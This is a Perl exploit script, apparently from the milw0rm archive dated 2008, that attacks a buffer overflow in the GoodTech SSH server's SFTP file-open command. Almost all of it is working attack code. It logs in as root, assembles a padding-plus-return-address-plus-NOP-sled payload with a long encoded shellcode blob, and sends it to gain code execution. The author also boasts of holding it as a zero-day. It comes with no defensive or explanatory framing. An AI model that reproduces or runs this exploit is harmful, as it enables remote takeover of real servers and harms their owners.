# GoodTech SSH Remote Buffer Overflow Exploit
# Written by r0ut3r - writ3r [at] gmail.com
#
# SSH_FXP_OPEN command contains a buffer oveflow.
#
# All other operations are also vulnerable, opendir, unlink, etc.
#
# 0day for 2 months :)

use Net::SSH2;

my $user = "root";
my $pass = "yahh";

my $ip = "127.0.0.1";
my $port = 22;

my $ssh2 = Net::SSH2->new();

print "[+] Connecting...\n";
$ssh2->connect($ip, $port) || die "[-] Unable to connect!\n";
$ssh2->auth_password($user, $pass) || "[-] Incorrect credentials\n";
print "[+] Sending payload\n";

my $junk = 'A'x164;
my $eip = "\x49\x13\x9c\x7c"; #call esp
my $nops = "\x90"x20;

my $shellcode =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x33".
"\x2e\x9c\x0e\x83\xeb\xfc\xe2\xf4\xcf\x44\x77\x43\xdb\xd7\x63\xf1".
"\xcc\x4e\x17\x62\x17\x0a\x17\x4b\x0f\xa5\xe0\x0b\x4b\x2f\x73\x85".
"\x7c\x36\x17\x51\x13\x2f\x77\x47\xb8\x1a\x17\x0f\xdd\x1f\x5c\x97".
"\x9f\xaa\x5c\x7a\x34\xef\x56\x03\x32\xec\x77\xfa\x08\x7a\xb8\x26".
"\x46\xcb\x17\x51\x17\x2f\x77\x68\xb8\x22\xd7\x85\x6c\x32\x9d\xe5".
"\x30\x02\x17\x87\x5f\x0a\x80\x6f\xf0\x1f\x47\x6a\xb8\x6d\xac\x85".
"\x73\x22\x17\x7e\x2f\x83\x17\x4e\x3b\x70\xf4\x80\x7d\x20\x70\x5e".
"\xcc\xf8\xfa\x5d\x55\x46\xaf\x3c\x5b\x59\xef\x3c\x6c\x7a\x63\xde".
"\x5b\xe5\x71\xf2\x08\x7e\x63\xd8\x6c\xa7\x79\x68\xb2\xc3\x94\x0c".
"\x66\x44\x9e\xf1\xe3\x46\x45\x07\xc6\x83\xcb\xf1\xe5\x7d\xcf\x5d".
"\x60\x7d\xdf\x5d\x70\x7d\x63\xde\x55\x46\x8d\x52\x55\x7d\x15\xef".
"\xa6\x46\x38\x14\x43\xe9\xcb\xf1\xe5\x44\x8c\x5f\x66\xd1\x4c\x66".
"\x97\x83\xb2\xe7\x64\xd1\x4a\x5d\x66\xd1\x4c\x66\xd6\x67\x1a\x47".
"\x64\xd1\x4a\x5e\x67\x7a\xc9\xf1\xe3\xbd\xf4\xe9\x4a\xe8\xe5\x59".
"\xcc\xf8\xc9\xf1\xe3\x48\xf6\x6a\x55\x46\xff\x63\xba\xcb\xf6\x5e".
"\x6a\x07\x50\x87\xd4\x44\xd8\x87\xd1\x1f\x5c\xfd\x99\xd0\xde\x23".
"\xcd\x6c\xb0\x9d\xbe\x54\xa4\xa5\x98\x85\xf4\x7c\xcd\x9d\x8a\xf1".
"\x46\x6a\x63\xd8\x68\x79\xce\x5f\x62\x7f\xf6\x0f\x62\x7f\xc9\x5f".
"\xcc\xfe\xf4\xa3\xea\x2b\x52\x5d\xcc\xf8\xf6\xf1\xcc\x19\x63\xde".
"\xb8\x79\x60\x8d\xf7\x4a\x63\xd8\x61\xd1\x4c\x66\xdc\xe0\x7c\x6e".
"\x60\xd1\x4a\xf1\xe3\x2e\x9c\x0e";

my $payload = $junk.$eip.$nops.$shellcode;

my $sftp = $ssh2->sftp();
$sftp->open($payload);

print "[+] Sent";
$ssh2->disconnect;

# milw0rm.com [2008-10-22]
